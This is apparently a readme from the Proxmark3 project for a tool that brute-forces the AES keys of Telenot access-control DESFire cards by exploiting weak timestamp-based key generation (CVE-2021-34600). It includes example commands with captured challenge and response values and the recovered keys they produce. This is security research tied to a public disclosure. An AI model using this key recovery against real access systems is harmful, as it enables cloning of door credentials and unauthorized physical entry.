proxmark3/tools/mfd_aes_brute/readme.txt
2023-08-09 14:30:07 +02:00

62 lines
1.5 KiB
Text

# AUTH AES
#
# blog: https://x41-dsec.de/lab/blog/telenot-complex-insecure-keygen/
#
# Recover the AES key for Telenot Access system's desfire cards.
# CVE-2021-34600
#
# Finds the UNIX timestamp an AES key created with compasX version older than 32.0 has been generated.
# Will not work on access tokens afterwards.
#
# Unix time stamp 2006-01-01
1136073600
# reader challenge
3fda933e2953ca5e6cfbbf95d1b51ddf
# tag resp, challenge
97fe4b5de24188458d102959b888938c988e96fb98469ce7426f50f108eaa583
#
# Original source code by authors
#
# simple
./brute_key 1605394800 bb6aea729414a5b1eff7b16328ce37fd 82f5f498dbc29f7570102397a2e5ef2b6dc14a864f665b3c54d11765af81e95c
# complex
./brute_key 1136073600 3fda933e2953ca5e6cfbbf95d1b51ddf 97fe4b5de24188458d102959b888938c988e96fb98469ce7426f50f108eaa583
#
# Multi threaded version (Iceman)
#
# simple
./mfd_aes_brute 1605394800 bb6aea729414a5b1eff7b16328ce37fd 82f5f498dbc29f7570102397a2e5ef2b6dc14a864f665b3c54d11765af81e95c
expected result:
261c07a23f2bc8262f69f10a5bdf3764
Bruteforce using 8 threads
Found timestamp........ 1631100305 ( '2021-09-08 13:25:05' )
key.................... 261c07a23f2bc8262f69f10a5bdf3764
execution time 1.00 sec
#
# complex
./mfd_aes_brute 1136073600 3fda933e2953ca5e6cfbbf95d1b51ddf 97fe4b5de24188458d102959b888938c988e96fb98469ce7426f50f108eaa583
expected result:
e757178e13516a4f3171bc6ea85e165a
Bruteforce using 8 threads
Found timestamp........ 1606834416 ( '2020-12-01 15:53:36' )
key.................... e757178e13516a4f3171bc6ea85e165a
execution time 18.54 sec